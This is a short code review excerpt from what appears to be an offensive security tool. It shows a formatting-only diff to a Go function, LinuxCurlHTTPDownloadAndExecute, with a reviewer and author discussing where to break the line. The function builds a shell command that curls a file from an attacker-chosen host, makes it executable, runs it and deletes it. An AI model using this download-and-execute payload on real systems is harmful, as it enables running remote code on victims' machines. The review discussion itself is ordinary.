payload/download.go

```diff
@@ -9,7 +9,8 @@ import (
 func LinuxCurlHTTPDownloadAndExecute(lhost string, lport int, downloadFile string) string {
 	output := "/tmp/" + random.RandLetters(3)
 
-	return fmt.Sprintf("curl -so %s http://%s:%d/%s && chmod +x %s && %s & rm -f %s", output, lhost, lport, downloadFile, output, output, output)
+	return fmt.Sprintf("curl -so %s http://%s:%d/%s && chmod +x %s && %s & rm -f %s", output, lhost,
+		lport, downloadFile, output, output, output)
```

Comment:
Breaking a long line? Maybe drop all arguments to the second line?

Reply:
Yeah, I was hitting a warning here and didn't notice because I'm a bad dev. Good call on where to split! Changed.